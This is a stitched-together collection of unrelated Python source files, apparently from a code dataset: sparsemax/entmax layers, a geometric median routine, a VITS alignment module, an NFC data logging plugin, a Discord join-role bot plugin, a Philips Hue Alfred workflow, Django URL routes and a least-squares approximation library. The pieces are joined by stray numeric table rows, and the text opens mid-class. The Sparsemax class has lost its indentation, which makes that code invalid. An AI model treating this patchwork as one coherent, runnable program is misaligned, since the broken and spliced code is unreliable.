        rhos = _Sparsemax2._make_ix_like(input, dim)
        # support: positions where rho * z_sorted > cumsum(z_sorted) - 1
        support = rhos * input_srt > input_cumsum
        support_size = support.sum(dim=dim).unsqueeze(dim)
        tau = input_cumsum.gather(dim, support_size - 1)
        tau /= support_size.to(input.dtype)
        return tau, support_size

    @staticmethod
    def _make_ix_like(input, dim=0):
        """Return a 1..d index tensor broadcastable along `dim` of `input`."""
        d = input.size(dim)
        rho = torch.arange(1, d + 1, device=input.device, dtype=input.dtype)
        view = [1] * input.dim()
        view[0] = -1
        return rho.view(view).transpose(0, dim)
class Sparsemax(nn.Module):
def __init__(self, dim: int = -1):
super(Sparsemax, self).__init__()
self.dim = dim
self.sparsemax = _Sparsemax1.apply
def forward(self, input: torch.Tensor) -> torch.Tensor:
return self.sparsemax(input, self.dim)
class EntmaxBisect(nn.Module):
    """Module wrapper around ``entmax_bisect`` with fixed ``alpha``/``dim``/``n_iter``."""

    def __init__(self, alpha: Union[nn.Parameter, float] = 1.5, dim: int = -1, n_iter: int = 50):
        super().__init__()
        self.alpha = alpha
        self.dim = dim
        self.n_iter = n_iter

    def forward(self, X):
        """Compute the alpha-entmax transform of ``X`` along ``self.dim``."""
        result = entmax_bisect(X, alpha=self.alpha, dim=self.dim, n_iter=self.n_iter)
        return result
| 7,030 | 2,376 |
from scipy.spatial.distance import cdist, euclidean
def geometric_median(X, eps=1e-5):
    """Compute the geometric median of the observations (rows) of X, up to tolerance eps.

    The geometric median minimizes the sum of Euclidean distances to the data
    points. This is the modified Weiszfeld iteration of Vardi & Zhang (2000),
    which also handles iterates that coincide exactly with a data point.

    NOTE(review): relies on ``np`` (numpy) being imported at module level.
    """
    y = np.mean(X, 0)  # start from the centroid
    while True:
        D = cdist(X, [y])  # distance from each point to the current estimate
        nonzeros = (D != 0)[:, 0]  # mask of points NOT coinciding with y
        Dinv = 1 / D[nonzeros]
        Dinvs = np.sum(Dinv)
        W = Dinv / Dinvs  # normalized inverse-distance (Weiszfeld) weights
        T = np.sum(W * X[nonzeros], 0)  # weighted average of the non-coincident points
        num_zeros = len(X) - np.sum(nonzeros)
        if num_zeros == 0:
            y1 = T  # plain Weiszfeld step
        elif num_zeros == len(X):
            return y  # every point coincides with y: y is the median
        else:
            # y sits on >=1 data point: damp the step (Vardi-Zhang correction)
            R = (T - y) * Dinvs
            r = np.linalg.norm(R)
            rinv = 0 if r == 0 else num_zeros / r
            y1 = max(0, 1 - rinv) * T + min(1, rinv) * y
        if euclidean(y, y1) < eps:
            return y1
        y = y1
def ssm(X, alpha=1):
    """Compute the stabilized sample mean (Orenstein, 2019) of each column of X.

    Args:
        X: 2-D array-like (numpy array or pandas DataFrame) of observations
            (rows) by variables (columns).
        alpha: stabilization parameter; as alpha -> infinity this recovers the
            plain mean, and alpha -> 0 approximates the median.

    Returns:
        The per-column stabilized means (same container family as the inputs:
        numpy 1-D array for an ndarray, Series for a DataFrame).
    """
    # First, second, and third uncentered moments of each column.
    mu = np.mean(X, 0)
    mu2 = np.mean(np.square(X), 0)
    mu3 = np.mean(np.power(X, 3), 0)
    # mean - (third central moment) / (3 * (2 + alpha*n) * variance)
    # NOTE: the original used pandas' `.div(...)`, which raises AttributeError
    # for numpy arrays; plain `/` is equivalent for pandas and works for both.
    third_central = mu3 - 3 * mu * mu2 + 2 * np.power(mu, 3)
    variance = mu2 - np.square(mu)
    return mu - third_central / (3 * (2 + alpha * X.shape[0]) * variance)
| 1,423 | 547 |
"""Maximum path calculation module.
This code is based on https://github.com/jaywalnut310/vits.
"""
import warnings
import numpy as np
import torch
from numba import njit, prange
try:
    # Prefer the compiled Cython kernel when it has been built in place.
    from .core import maximum_path_c

    is_cython_avalable = True  # NOTE(review): misspelled ("avalable") but used consistently in this module
except ImportError:
    is_cython_avalable = False
    warnings.warn(
        "Cython version is not available. Fallback to 'EXPERIMETAL' numba version. "
        "If you want to use the cython version, please build it as follows: "
        "`cd espnet2/gan_tts/vits/monotonic_align; python setup.py build_ext --inplace`"
    )
def maximum_path(neg_x_ent: torch.Tensor, attn_mask: torch.Tensor) -> torch.Tensor:
    """Calculate maximum path.

    Args:
        neg_x_ent (Tensor): Negative X entropy tensor (B, T_feats, T_text).
        attn_mask (Tensor): Attention mask (B, T_feats, T_text).

    Returns:
        Tensor: Maximum path tensor (B, T_feats, T_text).
    """
    device, dtype = neg_x_ent.device, neg_x_ent.dtype
    # The path search kernels run on CPU over float32 scores / int32 paths.
    neg_x_ent = neg_x_ent.cpu().numpy().astype(np.float32)
    path = np.zeros(neg_x_ent.shape, dtype=np.int32)
    # Per-batch valid lengths, read off the first column/row of the mask.
    t_t_max = attn_mask.sum(1)[:, 0].cpu().numpy().astype(np.int32)
    t_s_max = attn_mask.sum(2)[:, 0].cpu().numpy().astype(np.int32)
    if is_cython_avalable:
        maximum_path_c(path, neg_x_ent, t_t_max, t_s_max)
    else:
        # slower experimental numba fallback (see module-level warning)
        maximum_path_numba(path, neg_x_ent, t_t_max, t_s_max)
    return torch.from_numpy(path).to(device=device, dtype=dtype)
@njit
def maximum_path_each_numba(path, value, t_y, t_x, max_neg_val=-np.inf):
    """Calculate a single maximum path with numba.

    Forward pass accumulates best path scores in-place in `value`; the
    backward pass marks the chosen monotonic alignment with 1s in `path`,
    moving left by at most one column per row.
    """
    index = t_x - 1
    # Forward DP: value[y, x] += max(stay in column x, advance from x-1).
    for y in range(t_y):
        for x in range(max(0, t_x + y - t_y), min(t_x, y + 1)):
            if x == y:
                # on the diagonal boundary the path cannot have stayed in this column
                v_cur = max_neg_val
            else:
                v_cur = value[y - 1, x]
            if x == 0:
                if y == 0:
                    v_prev = 0.0  # path origin
                else:
                    v_prev = max_neg_val
            else:
                v_prev = value[y - 1, x - 1]
            value[y, x] += max(v_prev, v_cur)
    # Backtrack from the last column, emitting one cell per row.
    for y in range(t_y - 1, -1, -1):
        path[y, index] = 1
        if index != 0 and (index == y or value[y - 1, index] < value[y - 1, index - 1]):
            index = index - 1
@njit(parallel=True)
def maximum_path_numba(paths, values, t_ys, t_xs):
    """Compute one monotonic alignment path per batch element, in parallel."""
    batch_size = paths.shape[0]
    for b in prange(batch_size):
        maximum_path_each_numba(paths[b], values[b], t_ys[b], t_xs[b])
| 2,493 | 966 |
from plugins.c2c_pb2 import NFCData
from plugins.c2s_pb2 import ServerData
def format_data(data):
    """Render serialized NFCData bytes as a short human-readable summary string."""
    if len(data) == 0:
        return ""
    parsed = NFCData()
    parsed.ParseFromString(data)
    # C = data coming from the card, R = from the reader
    source_letter = "C" if parsed.data_source == NFCData.CARD else "R"
    initial_marker = "(initial) " if parsed.data_type == NFCData.INITIAL else ""
    return "%s: %s%s" % (source_letter, initial_marker, bytes(parsed.data))
def handle_data(log, data):
    """Parse a serialized ServerData message, log its opcode and payload, and pass the bytes through."""
    message = ServerData()
    message.ParseFromString(data)
    opcode_name = ServerData.Opcode.Name(message.opcode)
    log(opcode_name, format_data(message.data))
    return data
| 620 | 225 |
from datetime import datetime, timedelta
import gevent
from disco.types.base import SlottedModel
from disco.types.guild import VerificationLevel
from disco.util.snowflake import to_datetime
from rowboat.plugins import RowboatPlugin as Plugin
from rowboat.types import Field, snowflake
from rowboat.types.plugin import PluginConfig
class JoinPluginConfigAdvanced(SlottedModel):
    """Per-verification-level delay (seconds) before the join role is granted."""
    low = Field(int, default=0)
    medium = Field(int, default=5)
    high = Field(int, default=10)
    highest = Field(int, default=30, alias='extreme')  # Disco calls it extreme, the client calls it Highest.
class JoinPluginConfig(PluginConfig):
    """Configuration for the join plugin."""
    join_role = Field(snowflake, default=None)  # role granted to newly joined members
    security = Field(bool, default=False)  # when True, delay the grant per verification level
    advanced = Field(JoinPluginConfigAdvanced)  # per-verification-level delays
    # (removed a stray dead `pass` statement that followed the field definitions)
@Plugin.with_config(JoinPluginConfig)
class JoinPlugin(Plugin):
    """Grants the configured join role to new members, optionally delayed per verification level."""

    @Plugin.listen('GuildMemberAdd')
    def on_guild_member_add(self, event):
        if event.member.user.bot:
            return  # I simply do not care
        verification_level = event.guild.verification_level
        if not event.config.security:
            # Let's assume that if the server has join roles enabled and security disabled,
            # they don't care about email verification.
            try:
                event.member.add_role(event.config.join_role)
            except:
                # NOTE(review): bare except hides real API failures; narrow it if possible
                print("Failed to add_role in join plugin for user {} in {}. join_role may be None? It is currently: {}".format(
                    event.member.id, event.guild.id, event.config.join_role))
            return
        if verification_level is VerificationLevel.LOW:  # "Must have a verified email on their Discord account"
            # We take a "guess" that if the server has join roles enabled, they don't care about email verification.
            # NOTE(review): the role is added immediately AND scheduled again below --
            # this looks like a duplicate add; confirm whether both calls are intended.
            event.member.add_role(event.config.join_role)
            gevent.spawn_later(event.config.advanced.low, event.member.add_role, event.config.join_role)
            return
        if verification_level is VerificationLevel.MEDIUM:
            gevent.spawn_later(event.config.advanced.medium, event.member.add_role, event.config.join_role)
        if verification_level is VerificationLevel.HIGH:
            gevent.spawn_later(event.config.advanced.high, event.member.add_role, event.config.join_role)
        if verification_level is VerificationLevel.EXTREME:
            gevent.spawn_later(event.config.advanced.highest, event.member.add_role, event.config.join_role)

    @Plugin.command('debugdelay', '[length:int]', group='join', level=-1)
    def trigger_delay(self, event, length: int = None):
        """Debug command: schedule a message `length` seconds out and report the actual delay."""
        length = length if length else 10
        msg = event.channel.send_message("Sending later...")

        def calc_timediff():
            # NOTE(review): defined but never called; the lambda below duplicates this logic
            return "Scheduled for {} after trigger, took {}".format(length, (datetime.now() - to_datetime(msg.id)))
        gevent.spawn_later(length,
                           lambda: event.channel.send_message("Scheduled for {} after trigger, took {}"
                                                              .format(length, (
                                                                  datetime.now() - to_datetime(msg.id)) / timedelta(seconds=1))))
| 3,191 | 920 |
# encoding: utf-8
from __future__ import unicode_literals
import colorsys
import datetime
import json
import os
import random
import sys
import time
from packages.workflow import Workflow3 as Workflow
import colors
import harmony
import request
import setup
import utils
class HueAction:
    """Executes Philips Hue actions parsed from Alfred workflow queries.

    A query is a list like ``['lights', '1', 'color', 'random']`` --
    resource type, resource id, function name, then optional arguments.
    """

    def __init__(self):
        self.hue_request = request.HueRequest()

    def _get_xy_color(self, color, gamut):
        """Validate and convert hex color to XY space."""
        return colors.Converter(gamut).hex_to_xy(utils.get_color_value(color))

    def _get_random_xy_color(self, gamut):
        """Return a random fully-saturated color converted to XY space."""
        random_color = colorsys.hsv_to_rgb(random.random(), 1, 1)
        random_color = tuple([255 * x for x in random_color])
        return colors.Converter(gamut).rgb_to_xy(*random_color)

    def _set_palette(self, lids, palette):
        """Assign palette[i] (an xy pair) to light lids[i], one request each."""
        for index, lid in enumerate(lids):
            self.hue_request.request(
                'put',
                '/lights/%s/state' % lid,
                json.dumps({'xy': palette[index]})
            )

    def _shuffle_group(self, group_id):
        """Randomly permute the colors of the lights that are on in a group."""
        lights = utils.get_lights()
        lids = utils.get_group_lids(group_id)
        # Only shuffle the lights that are on
        on_lids = [lid for lid in lids if lights[lid]['state']['on']]
        on_xy = [lights[lid]['state']['xy'] for lid in on_lids]
        # Bug fix: with fewer than two lights on, no derangement exists and the
        # retry loop below would spin forever.
        if len(on_xy) < 2:
            return
        shuffled = list(on_xy)
        # Shuffle until all indexes are different (generate a derangement)
        while not all([on_xy[i] != shuffled[i] for i in range(len(on_xy))]):
            random.shuffle(shuffled)
        self._set_palette(on_lids, shuffled)

    def _set_harmony(self, group_id, mode, root):
        """Color the group's lit lights with a harmony palette built from root."""
        lights = utils.get_lights()
        lids = utils.get_group_lids(group_id)
        palette = []
        on_lids = [lid for lid in lids if lights[lid]['state']['on']]
        args = (len(on_lids), '#%s' % utils.get_color_value(root))
        harmony_colors = getattr(harmony, mode)(*args)
        for lid in on_lids:
            gamut = colors.get_light_gamut(lights[lid]['modelid'])
            xy = self._get_xy_color(harmony_colors.pop(), gamut)
            palette.append(xy)
        self._set_palette(on_lids, palette)

    def execute(self, action):
        """Dispatch one parsed query (see class docstring) to the Hue API.

        Returns True for a completed shuffle, None otherwise.
        """
        is_light = action[0] == 'lights'
        is_group = action[0] == 'groups'
        if not is_light and not is_group:
            return
        rid = action[1]
        function = action[2]
        value = action[3] if len(action) > 3 else None
        lights = utils.get_lights()
        # NOTE(review): `groups` is never read below; kept in case get_groups()
        # warms a cache -- confirm and drop.
        groups = utils.get_groups()
        # Default API request parameters
        method = 'put'
        endpoint = '/groups/%s/action' % rid if is_group else '/lights/%s/state' % rid
        if function == 'off':
            data = {'on': False}
        elif function == 'on':
            data = {'on': True}
        elif function == 'bri':
            # Brightness arrives as a percentage; scale to the API's 0-255 range.
            value = int((float(value) / 100) * 255) if value else 255
            data = {'bri': value}
        elif function == 'shuffle':
            if not is_group:
                print('Shuffle can only be called on groups.'.encode('utf-8'))
                return
            self._shuffle_group(rid)
            return True
        elif function == 'rename':
            endpoint = '/groups/%s' % rid if is_group else '/lights/%s' % rid
            data = {'name': value}
        elif function == 'effect':
            data = {'effect': value}
        elif function == 'color':
            if value == 'random':
                if is_group:
                    gamut = colors.GamutA
                    data = {'xy': self._get_random_xy_color(gamut)}
                else:
                    gamut = colors.get_light_gamut(lights[rid]['modelid'])
                    data = {'xy': self._get_random_xy_color(gamut)}
            else:
                try:
                    if is_group:
                        gamut = colors.GamutA
                    else:
                        gamut = colors.get_light_gamut(lights[rid]['modelid'])
                    data = {'xy': self._get_xy_color(value, gamut)}
                except ValueError:
                    print('Error: Invalid color. Please use a 6-digit hex color.'.encode('utf-8'))
                    return
        elif function == 'harmony':
            if not is_group:
                print('Color harmonies can only be set on groups.'.encode('utf-8'))
                return
            # Bug fix: was `len(action) > 3`, which raised IndexError on
            # action[4] whenever no root color was supplied (len == 4).
            root = action[4] if len(action) > 4 else None
            if value not in harmony.MODES:
                print('Invalid harmony mode.'.encode('utf-8'))
                return
            self._set_harmony(rid, value, root)
            return
        elif function == 'reminder':
            try:
                time_delta_int = int(value)
            except ValueError:
                print('Error: Invalid time delta for reminder.'.encode('utf-8'))
                return
            reminder_time = datetime.datetime.utcfromtimestamp(time.time() + time_delta_int)
            method = 'post'
            data = {
                'name': 'Alfred Hue Reminder',
                'command': {
                    'address': self.hue_request.api_path + endpoint,
                    'method': 'PUT',
                    'body': {'alert': 'lselect'},
                },
                'time': reminder_time.replace(microsecond=0).isoformat(),
            }
            endpoint = '/schedules'
        elif function == 'set':
            # if bridge is deconz, scenes are set differently.
            # what we need is groups:group_id:scenes:scene_id:recall
            is_deconz = False
            try:
                # NOTE(review): relies on the module-level `workflow` global
                # set in the __main__ block -- confirm this is intended.
                if workflow.stored_data("full_state")["config"]["modelid"] == "deCONZ":
                    is_deconz = True
            except (TypeError, KeyError):
                # Bug fix: was a bare `except:` which also hid real errors.
                # not sure if hue also returns config/modelid
                pass
            if is_deconz:
                method = 'put'
                endpoint = '/groups/{}/scenes/{}/recall'.format(rid, value)
                data = {}
            else:
                data = {'scene': value}
        elif function == 'save':
            lids = utils.get_group_lids(rid)
            method = 'post'
            endpoint = '/scenes'
            data = {'name': value, 'lights': lids, 'recycle': False}
        else:
            return
        # Make the request
        self.hue_request.request(method, endpoint, json.dumps(data))
        return
def main(workflow):
    """Entry point: split the workflow argument on '|' and run each query."""
    # Handle multiple queries separated with '|' (pipe) character
    for raw_query in workflow.args[0].split('|'):
        parts = raw_query.split(':')
        if parts[0] == 'set_bridge':
            bridge_arg = parts[1] if len(parts) > 1 else None
            setup.set_bridge(bridge_arg)
            continue
        handler = HueAction()
        try:
            handler.execute(parts)
            print(('Action completed! <%s>' % raw_query).encode('utf-8'))
        except ValueError:
            pass
if __name__ == '__main__':
    # `workflow` is deliberately module-global: HueAction.execute reads it
    # when probing for a deCONZ bridge.
    workflow = Workflow()
    sys.exit(workflow.run(main))
from django.urls import path
from accounts.views import user_profile, LogoutView, LoginView, RegisterView, user_profile_edit
# URL routes for the accounts app. The function-based views were migrated to
# class-based views (CBV); the old routes are kept as comments for reference.
urlpatterns = [
    # path('login/', login_user, name='login user'),
    path('login/', LoginView.as_view(), name='login user'),  # CBV
    # path('logout/', logout_user, name='logout user'),
    path('logout/', LogoutView.as_view(), name='logout user'),  # CBV
    # path('register/', register_user, name='register user'),
    path('register/', RegisterView.as_view(), name='register user'),  # CBV
    # path('profile/', user_profile, name='current user profile'),
    path('profile/<int:pk>', user_profile, name='user profile'),
    path('edit/<int:pk>', user_profile_edit, name='user profile edit'),
]
| 734 | 236 |
"""
Approximation of functions by linear combination of basis functions in
function spaces and the least squares method or the collocation method
for determining the coefficients.
"""
from __future__ import print_function
import sympy as sym
import numpy as np
import mpmath
import matplotlib.pyplot as plt
#import scitools.std as plt
def least_squares_non_verbose(f, psi, Omega, symbolic=True):
    """
    Compute the least-squares best approximation of f(x) on the interval
    Omega (2-list) in the space spanned by the expressions in psi.
    All integrals are evaluated numerically with mpmath; no progress is
    printed. Returns (u, c): the approximation and its coefficients.
    """
    x = sym.Symbol('x')
    n_funcs = len(psi)

    def _integrate(expr):
        # Numerical quadrature of a sympy expression over Omega.
        func = sym.lambdify([x], expr, 'mpmath')
        return mpmath.quad(func, [Omega[0], Omega[1]])

    gram = sym.zeros(n_funcs, n_funcs)
    rhs = sym.zeros(n_funcs, 1)
    for i in range(n_funcs):
        # Gram matrix is symmetric: fill the upper triangle and mirror it.
        for j in range(i, n_funcs):
            gram[i, j] = gram[j, i] = _integrate(psi[i] * psi[j])
        rhs[i, 0] = _integrate(psi[i] * f)

    coeffs = mpmath.lu_solve(gram, rhs)  # numerical solve
    coeffs = [coeffs[i, 0] for i in range(coeffs.rows)]
    u = sum(coeffs[i] * psi[i] for i in range(n_funcs))
    return u, coeffs
def least_squares(f, psi, Omega, symbolic=True):
    """
    Given a function f(x) on an interval Omega (2-list)
    return the best approximation to f(x) in the space V
    spanned by the functions in the list psi.

    If symbolic, each integral is attempted with sympy first and falls back
    to mpmath quadrature when sympy returns an unevaluated Integral.
    Returns (u, c): the approximation expression and its coefficients.
    """
    N = len(psi) - 1
    A = sym.zeros(N+1, N+1)
    b = sym.zeros(N+1, 1)
    x = sym.Symbol('x')
    print('...evaluating matrix...', end=' ')
    for i in range(N+1):
        # The Gram matrix is symmetric: only the upper triangle is computed.
        for j in range(i, N+1):
            print('(%d,%d)' % (i, j))
            integrand = psi[i]*psi[j]
            if symbolic:
                I = sym.integrate(integrand, (x, Omega[0], Omega[1]))
            if not symbolic or isinstance(I, sym.Integral):
                # Could not integrate symbolically, use numerical int.
                print('numerical integration of', integrand)
                integrand = sym.lambdify([x], integrand, 'mpmath')
                I = mpmath.quad(integrand, [Omega[0], Omega[1]])
            A[i,j] = A[j,i] = I
        # Right-hand side: inner product of psi[i] with f.
        integrand = psi[i]*f
        if symbolic:
            I = sym.integrate(integrand, (x, Omega[0], Omega[1]))
        if not symbolic or isinstance(I, sym.Integral):
            # Could not integrate symbolically, use numerical int.
            print('numerical integration of', integrand)
            integrand = sym.lambdify([x], integrand, 'mpmath')
            I = mpmath.quad(integrand, [Omega[0], Omega[1]])
        b[i,0] = I
    print()
    print('A:\n', A, '\nb:\n', b)
    if symbolic:
        c = A.LUsolve(b)  # symbolic solve
        # c is a sympy Matrix object, numbers are in c[i,0]
        c = [sym.simplify(c[i,0]) for i in range(c.shape[0])]
    else:
        c = mpmath.lu_solve(A, b)  # numerical solve
        c = [c[i,0] for i in range(c.rows)]
    print('coeff:', c)
    u = sum(c[i]*psi[i] for i in range(len(psi)))
    print('approximation:', u)
    return u, c
def numerical_linsys_solve(A, b, floating_point_calc='sympy'):
    """
    Given a linear system Au=b as sympy arrays, solve the
    system using different floating-point software.
    floating_point_calc may be 'sympy', 'numpy.float64',
    'numpy.float32'.
    This function is used to investigate ill-conditioning
    of linear systems arising from approximation methods.

    Note: the solution is only printed, not returned.
    """
    if floating_point_calc == 'sympy':
        # Despite the branch name, this path uses mpmath's fixed-precision
        # (double) matrices rather than sympy's exact arithmetic.
        #mpmath.mp.dsp = 10 # does not affect the computations here (sic: attribute is .dps)
        A = mpmath.fp.matrix(A)
        b = mpmath.fp.matrix(b)
        print('A:\n', A, '\nb:\n', b)
        c = mpmath.fp.lu_solve(A, b)
        #c = mpmath.lu_solve(A, b) # more accurate
        print('mpmath.fp.lu_solve:', c)
    elif floating_point_calc.startswith('numpy'):
        import numpy as np
        # Double precision (float64) by default
        A = np.array(A.evalf())
        b = np.array(b.evalf())
        if floating_point_calc == 'numpy.float32':
            # Single precision
            A = A.astype(np.float32)
            b = b.astype(np.float32)
        c = np.linalg.solve(A, b)
        print('numpy.linalg.solve, %s:' % floating_point_calc, c)
def least_squares_orth(f, psi, Omega, symbolic=True):
    """
    Same as least_squares, but for orthogonal
    basis such that one avoids calling up standard
    Gaussian elimination: the Gram matrix is diagonal,
    so each coefficient is simply b[i]/A[i].
    """
    N = len(psi) - 1
    A = [0]*(N+1)  # plain list to hold symbolic expressions
    b = [0]*(N+1)
    x = sym.Symbol('x')
    print('...evaluating matrix...', end=' ')
    for i in range(N+1):
        print('(%d,%d)' % (i, i))
        # Assume orthogonal psi can be be integrated symbolically
        # and that this is a successful/possible integration
        A[i] = sym.integrate(psi[i]**2, (x, Omega[0], Omega[1]))
        # Fallback on numerical integration if f*psi is too difficult
        # to integrate
        integrand = psi[i]*f
        if symbolic:
            I = sym.integrate(integrand, (x, Omega[0], Omega[1]))
        if not symbolic or isinstance(I, sym.Integral):
            print('numerical integration of', integrand)
            integrand = sym.lambdify([x], integrand, 'mpmath')
            I = mpmath.quad(integrand, [Omega[0], Omega[1]])
        b[i] = I
    print('A:\n', A, '\nb:\n', b)
    # Diagonal system: coefficients come directly from the ratios.
    c = [b[i]/A[i] for i in range(len(b))]
    print('coeff:', c)
    u = 0
    #for i in range(len(psi)):
    #    u += c[i]*psi[i]
    u = sum(c[i]*psi[i] for i in range(len(psi)))
    print('approximation:', u)
    return u, c
def trapezoidal(values, dx):
    """
    Composite trapezoidal rule for samples of a function on a uniform
    mesh with spacing dx; `values` holds the function values.
    """
    #return dx*np.sum(values)
    total = np.sum(values)
    # Trapezoidal weights: interior points count fully, endpoints count half.
    return dx * (total - 0.5*values[0] - 0.5*values[-1])
def least_squares_numerical(f, psi, N, x,
                            integration_method='scipy',
                            orthogonal_basis=False):
    """
    Given a function f(x) (Python function), a basis specified by the
    Python function psi(x, i), and a mesh x (array), return the best
    approximation to f(x) in in the space V spanned by the functions
    in the list psi. The best approximation is represented as an array
    of values corresponding to x. All calculations are performed
    numerically. integration_method can be `scipy` or `trapezoidal`
    (the latter uses x as mesh for evaluating f).

    Note: integration_method == 'sympy' actually uses mpmath quadrature.
    With orthogonal_basis=True only the diagonal of A is computed.
    """
    import scipy.integrate
    A = np.zeros((N+1, N+1))
    b = np.zeros(N+1)
    if not callable(f) or not callable(psi):
        raise TypeError('f and psi must be callable Python functions')
    Omega = [x[0], x[-1]]
    dx = x[1] - x[0]  # assume uniform partition
    print('...evaluating matrix...', end=' ')
    for i in range(N+1):
        # For an orthogonal basis only the diagonal entry (j == i) is needed.
        j_limit = i+1 if orthogonal_basis else N+1
        for j in range(i, j_limit):
            print('(%d,%d)' % (i, j))
            if integration_method == 'scipy':
                A_ij = scipy.integrate.quad(
                    lambda x: psi(x,i)*psi(x,j),
                    Omega[0], Omega[1], epsabs=1E-9, epsrel=1E-9)[0]
            elif integration_method == 'sympy':
                A_ij = mpmath.quad(
                    lambda x: psi(x,i)*psi(x,j),
                    [Omega[0], Omega[1]])
            else:
                values = psi(x,i)*psi(x,j)
                A_ij = trapezoidal(values, dx)
            A[i,j] = A[j,i] = A_ij
        # Right-hand side: inner product of f with psi_i.
        if integration_method == 'scipy':
            b_i = scipy.integrate.quad(
                lambda x: f(x)*psi(x,i), Omega[0], Omega[1],
                epsabs=1E-9, epsrel=1E-9)[0]
        elif integration_method == 'sympy':
            b_i = mpmath.quad(
                lambda x: f(x)*psi(x,i), [Omega[0], Omega[1]])
        else:
            values = f(x)*psi(x,i)
            b_i = trapezoidal(values, dx)
        b[i] = b_i
    # Diagonal solve for orthogonal bases, full solve otherwise.
    c = b/np.diag(A) if orthogonal_basis else np.linalg.solve(A, b)
    u = sum(c[i]*psi(x, i) for i in range(N+1))
    return u, c
def interpolation(f, psi, points):
    """
    Given a function f(x), return the approximation to
    f(x) in the space V, spanned by psi, that interpolates
    f at the given points. Must have len(points) = len(psi)

    The coefficients solve A c = b with A[i,j] = psi_j(points[i]) and
    b[i] = f(points[i]) (symbolic LU solve).
    """
    N = len(psi) - 1
    A = sym.zeros(N+1, N+1)
    b = sym.zeros(N+1, 1)
    # Wrap psi and f in Python functions rather than expressions
    # so that we can evaluate psi at points[i] (alternative to subs?)
    psi_sym = psi  # save symbolic expression
    x = sym.Symbol('x')
    psi = [sym.lambdify([x], psi[i], 'mpmath') for i in range(N+1)]
    f = sym.lambdify([x], f, 'mpmath')
    print('...evaluating matrix...')
    for i in range(N+1):
        for j in range(N+1):
            print('(%d,%d)' % (i, j))
            A[i,j] = psi[j](points[i])
        b[i,0] = f(points[i])
    print()
    print('A:\n', A, '\nb:\n', b)
    c = A.LUsolve(b)
    # c is a sympy Matrix object, turn to list
    c = [sym.simplify(c[i,0]) for i in range(c.shape[0])]
    print('coeff:', c)
    # u = sym.simplify(sum(c[i,0]*psi_sym[i] for i in range(N+1)))
    u = sym.simplify(sum(c[i]*psi_sym[i] for i in range(N+1)))
    print('approximation:', u)
    return u, c

collocation = interpolation  # synonym in this module
def regression(f, psi, points):
    """
    Given a function f(x), return the approximation to
    f(x) in the space V, spanned by psi, using a regression
    method based on points. Must have len(points) > len(psi).

    Solves the normal equations B c = d with
    B[i,j] = sum_k psi_i(x_k) psi_j(x_k) and d[i] = sum_k psi_i(x_k) f(x_k).
    """
    n_basis = len(psi)       # N + 1 in the book's notation
    # Use numpy arrays and numerical computing
    B = np.zeros((n_basis, n_basis))
    d = np.zeros(n_basis)
    # Wrap psi and f in Python functions rather than expressions
    # so that we can evaluate psi at points[i]
    x = sym.Symbol('x')
    psi_sym = psi  # save symbolic expression for u
    psi = [sym.lambdify([x], expr) for expr in psi_sym]
    f = sym.lambdify([x], f)
    print('...evaluating matrix...')
    for i in range(n_basis):
        for j in range(n_basis):
            B[i,j] = sum(psi[i](p)*psi[j](p) for p in points)
        d[i] = sum(psi[i](p)*f(p) for p in points)
    print('B:\n', B, '\nd:\n', d)
    c = np.linalg.solve(B, d)
    print('coeff:', c)
    u = sum(c[i]*psi_sym[i] for i in range(n_basis))
    print('approximation:', sym.simplify(u))
    return u, c
def regression_with_noise(f, psi, points):
    """
    Given a data points in the array f, return the approximation
    to the data in the space V, spanned by psi, using a regression
    method based on f and the corresponding coordinates in points.
    Must have len(points) = len(f) > len(psi).

    Same normal-equations setup as `regression`, but f is an array of
    (possibly noisy) samples instead of a symbolic expression.
    """
    N = len(psi) - 1
    m = len(points) - 1
    # Use numpy arrays and numerical computing
    B = np.zeros((N+1, N+1))
    d = np.zeros(N+1)
    # Wrap psi and f in Python functions rather than expressions
    # so that we can evaluate psi at points[i]
    x = sym.Symbol('x')
    psi_sym = psi  # save symbolic expression for u
    psi = [sym.lambdify([x], psi[i]) for i in range(N+1)]
    if not isinstance(f, np.ndarray):
        raise TypeError('f is %s, must be ndarray' % type(f))
    print('...evaluating matrix...')
    for i in range(N+1):
        for j in range(N+1):
            B[i,j] = 0
            for k in range(m+1):
                B[i,j] += psi[i](points[k])*psi[j](points[k])
        # d[i] pairs basis values with the sampled data f[k].
        d[i] = 0
        for k in range(m+1):
            d[i] += psi[i](points[k])*f[k]
    print('B:\n', B, '\nd:\n', d)
    c = np.linalg.solve(B, d)
    print('coeff:', c)
    u = sum(c[i]*psi_sym[i] for i in range(N+1))
    print('approximation:', sym.simplify(u))
    return u, c
def comparison_plot(
    f, u, Omega, filename='tmp',
    plot_title='', ymin=None, ymax=None,
    u_legend='approximation',
    points=None, point_values=None, points_legend=None,
    legend_loc='upper right',
    show=True):
    """Compare f(x) and u(x) for x in Omega in a plot.

    Saves the figure as <filename>.pdf and <filename>.png; optionally
    overlays markers at `points` (using f or `point_values`).
    """
    x = sym.Symbol('x')
    print('f:', f)
    print('u:', u)
    f = sym.lambdify([x], f, modules="numpy")
    u = sym.lambdify([x], u, modules="numpy")
    if len(Omega) != 2:
        raise ValueError('Omega=%s must be an interval (2-list)' % str(Omega))
    # When doing symbolics, Omega can easily contain symbolic expressions,
    # assume .evalf() will work in that case to obtain numerical
    # expressions, which then must be converted to float before calling
    # linspace below
    if not isinstance(Omega[0], (int,float)):
        Omega[0] = float(Omega[0].evalf())
    if not isinstance(Omega[1], (int,float)):
        Omega[1] = float(Omega[1].evalf())
    resolution = 601  # no of points in plot (high resolution)
    xcoor = np.linspace(Omega[0], Omega[1], resolution)
    # Vectorized functions expressions does not work with
    # lambdify'ed functions without the modules="numpy"
    exact = f(xcoor)
    approx = u(xcoor)
    plt.figure()
    plt.plot(xcoor, approx, '-')
    plt.plot(xcoor, exact, '--')
    legends = [u_legend, 'exact']
    if points is not None:
        if point_values is None:
            # Use f
            plt.plot(points, f(points), 'ko')
        else:
            # Use supplied points
            plt.plot(points, point_values, 'ko')
        if points_legend is not None:
            legends.append(points_legend)
        else:
            legends.append('points')
    plt.legend(legends, loc=legend_loc)
    plt.title(plot_title)
    plt.xlabel('x')
    if ymin is not None and ymax is not None:
        plt.axis([xcoor[0], xcoor[-1], ymin, ymax])
    plt.savefig(filename + '.pdf')
    plt.savefig(filename + '.png')
    if show:
        plt.show()
if __name__ == '__main__':
    # Library module: there is nothing useful to run directly.
    print('Module file not meant for execution.')
| 13,790 | 4,925 |
# * N <= 500, M <= 10000, max(p), max(a) <= 1e6
# * 10 points (คะแนน) : N, max(p), max(a) <= 10, M <= 15
